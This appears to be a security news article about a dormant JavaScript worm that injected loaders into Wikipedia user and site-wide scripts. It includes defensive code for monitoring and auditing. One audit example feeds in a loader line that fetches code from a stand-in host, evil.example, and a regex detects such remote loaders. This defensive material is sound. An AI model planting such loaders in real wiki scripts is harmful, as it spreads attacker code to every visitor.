PROBABLYPWNED
Malware · March 7, 2026 · 3 min read

Wikipedia Hit by Self-Propagating JavaScript Worm

A dormant JavaScript worm activated during a security review vandalized 4,000 Wikipedia pages in 23 minutes. Here's what happened and why it matters.

James Rivera

The Wikimedia Foundation disclosed a security incident on March 5 after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across its wikis. The worm modified 3,996 pages and compromised 85 user accounts before engineers contained the outbreak, all within 23 minutes.

What Happened

Wikimedia staff were conducting a routine security review of user-authored code when they inadvertently triggered dormant malicious code. The script, stored at User:Ololoshka562/test.js, had been uploaded in March 2024 and sat dormant for two years before activation.

Once executed, the worm self-propagated by injecting malicious JavaScript loaders into both individual users' common.js files and Wikipedia's global MediaWiki:Common.js—which loads for every visitor. This dual-injection technique gave the worm both user-level and site-wide persistence.

The attack chain worked like this: when an administrator or privileged user loaded a compromised page, the script executed in their browser context and used their elevated permissions to spread to additional pages. Because MediaWiki:Common.js is a protected system file, the attacker needed admin-level access to modify it—which they obtained by hijacking administrator sessions.
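The two injection targets differ sharply in blast radius: a user's own common.js affects one account, while MediaWiki:Common.js runs for every visitor. A monitor watching .js edits can triage on that distinction before anything else. A minimal sketch (the function name and severity labels are illustrative, not Wikimedia tooling; the title patterns follow MediaWiki's page-naming conventions):

```javascript
// Classify an edited page title by the scope of the script it controls.
// User:<name>/<anything>.js loads only for that account; MediaWiki:*.js
// pages (like MediaWiki:Common.js) load site-wide.
function classifyScriptPage(title) {
  if (/^MediaWiki:.*\.js$/.test(title)) return "site-wide";  // runs for every visitor
  if (/^User:[^/]+\/.+\.js$/.test(title)) return "user-level"; // runs for one account
  return "not a script page";
}

console.log(classifyScriptPage("MediaWiki:Common.js"));       // "site-wide"
console.log(classifyScriptPage("User:Ololoshka562/test.js")); // "user-level"
```

An edit stream filtered through a check like this would have surfaced both halves of the dual-injection technique as high-priority events.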

Technical Details

According to Wikimedia's incident report, the malicious script had reportedly been linked to previous attacks on wiki projects. The code was designed to:

  1. Inject loaders into individual users' common.js pages for user-level persistence
  2. Modify MediaWiki:Common.js for site-wide execution
  3. Vandalize article content on Meta-Wiki
  4. Propagate to any privileged user who loaded a compromised page

The script exploited a fundamental trust model in MediaWiki: user scripts execute with the full permissions of the logged-in user. For administrators, this means write access to protected system files.
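One consequence of that trust model is that the set of accounts worth hijacking is exactly the set that can touch protected script pages. Modern MediaWiki splits this out: editing sitewide JavaScript requires the editsitejs right (held by interface administrators) in addition to editinterface, which narrows the attack surface. A sketch of that gate, assuming the post-1.32 rights split (the right names are real MediaWiki rights; the helper function is illustrative):

```javascript
// Sketch: can a session's account modify sitewide JavaScript such as
// MediaWiki:Common.js? Right names follow MediaWiki's rights model;
// the helper itself is illustrative, not MediaWiki code.
function canEditSiteJs(rights) {
  // Since the interface-admin split, sitewide JS needs both rights.
  return rights.includes("editinterface") && rights.includes("editsitejs");
}

console.log(canEditSiteJs(["edit", "editinterface", "editsitejs"])); // true
console.log(canEditSiteJs(["edit", "editinterface"]));               // false
```

Keeping the interface-admin group small is therefore a direct mitigation: fewer privileged sessions means fewer paths for a worm to reach site-wide persistence.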

Why This Matters

Wikipedia's open editing model has always balanced accessibility against security. This incident highlights how that balance can be exploited—even by code that sat dormant for years waiting to be triggered.

The attack mirrors supply-chain compromises seen in other ecosystems. Much as threat actors have planted malicious packages in npm registries and waited for them to be installed, this attacker uploaded malicious code and simply waited. The two-year dormancy period meant the script predated any routine review of recent changes, which made it far harder to detect.

For organizations running MediaWiki instances—including corporate wikis and internal knowledge bases—this incident underscores the need to audit user-uploaded scripts. The Wikimedia Foundation has confirmed they're implementing additional code review processes for user scripts.

No Data Breach Confirmed

Wikimedia emphasized that no personal information was exposed. The worm's behavior was purely destructive—vandalizing pages and modifying scripts—rather than data exfiltration. All affected pages have been restored from backups.

"The code was active for a 23 minute period," the Foundation stated. "During that time, it changed and deleted content on Meta-Wiki—which is now being restored—but it did not cause permanent damage. There is no evidence that Wikipedia was under attack, or that personal information was breached."

Detection and Response

Engineers detected the anomalous activity through automated monitoring that flagged unusual edit patterns. They temporarily restricted editing across all projects while investigating, then began systematically reverting malicious changes.
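A worm editing thousands of pages in minutes produces an edit rate no human sustains, which is what rate-based detection keys on. A minimal sketch of the idea using a sliding one-minute window (the function name and thresholds are illustrative, not Wikimedia's actual rules):

```javascript
// Sketch: flag an edit burst when more than `threshold` edits land inside
// any sliding window of `windowMs` milliseconds.
function detectBurst(editTimestampsMs, windowMs = 60_000, threshold = 50) {
  const sorted = [...editTimestampsMs].sort((a, b) => a - b);
  let start = 0;
  for (let end = 0; end < sorted.length; end++) {
    // Shrink the window until it spans at most windowMs.
    while (sorted[end] - sorted[start] > windowMs) start++;
    if (end - start + 1 > threshold) return true; // faster than any human editor
  }
  return false;
}

// 200 edits in 10 seconds, the signature of automated propagation:
console.log(detectBurst(Array.from({ length: 200 }, (_, i) => i * 50))); // true
```

Scoping such a detector to .js pages and privileged accounts would cut the false-positive rate further, since legitimate mass edits rarely touch script pages.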

The rapid response demonstrates why monitoring for suspicious behavior matters more than perimeter defenses alone: the worm was already executing inside trusted infrastructure, so only behavioral detection could catch it.

Organizations running wiki platforms should review their security configurations. Key mitigations include:

  1. Audit existing user scripts for dormant malicious code
  2. Implement Content Security Policy to restrict script execution
  3. Enable edit monitoring to detect mass automated changes
  4. Restrict system file modifications to verified accounts with MFA
  5. Maintain offline backups separate from production systems
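The first mitigation above can be partly automated. A static pass over user-script source can flag loaders that pull code from outside an allowlist, which is exactly the shape of a dormant loader injection. A sketch (mw.loader.load and importScriptURI are real MediaWiki loader calls; the allowlist, function name, and patterns are illustrative):

```javascript
// Sketch: audit user-script source for loader calls fetching code from
// hosts outside an allowlist. Allowed hosts here are examples only.
const ALLOWED_HOSTS = new Set(["en.wikipedia.org", "meta.wikimedia.org"]);

function auditScript(source) {
  const findings = [];
  // Match mw.loader.load("...") and importScriptURI("...") with a string URL.
  const loaderCall = /(?:mw\.loader\.load|importScriptURI)\(\s*["']([^"']+)["']/g;
  for (const match of source.matchAll(loaderCall)) {
    const url = match[1];
    try {
      // Resolve protocol-relative URLs ("//host/...") against the wiki's origin.
      const host = new URL(url, "https://en.wikipedia.org").host;
      if (!ALLOWED_HOSTS.has(host)) findings.push(`loads from untrusted host: ${host}`);
    } catch {
      findings.push(`unparseable loader URL: ${url}`);
    }
  }
  return findings;
}

console.log(auditScript('mw.loader.load("https://evil.example/x.js");'));
// → ["loads from untrusted host: evil.example"]
```

Run across all User:*/common.js pages, a check like this turns a manual audit into a batch job, though it will not catch obfuscated loaders and should complement, not replace, human review.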

The incident serves as a reminder that open platforms require ongoing vigilance. Dormant threats can activate without warning, and two-year-old code can become today's security incident.
